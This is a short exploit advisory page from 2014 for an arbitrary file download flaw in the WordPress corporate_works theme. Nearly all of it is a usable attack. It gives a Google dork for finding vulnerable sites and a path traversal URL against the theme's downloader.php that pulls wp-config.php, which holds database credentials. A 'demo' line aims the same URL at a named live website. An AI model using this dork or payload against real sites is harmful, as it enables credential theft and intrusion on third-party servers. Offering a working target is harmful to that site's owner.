facebook facebook twitter rss

Wordpress corporate_works Theme Arbitrary File Download Vulnerability

Author: Felipe M , Published: 25-09-2014
# Exploit Title: Wordpress corporate_works Theme Arbitrary File Download Vulnerability

# Google Dork: inurl:/wp-content/themes/corporate_works

# Date: 25-09-2014

# Author: Felipe M.

# Author E-mail : secure@gudwal.com

# Software Link: http://themeforest.net/item/corporate-works-/121469

# Category:: webapps

# platform : php

# p0c :

http://[site]/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php

# demo :

http://www.trevidea.it/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php

Like us on Facebook :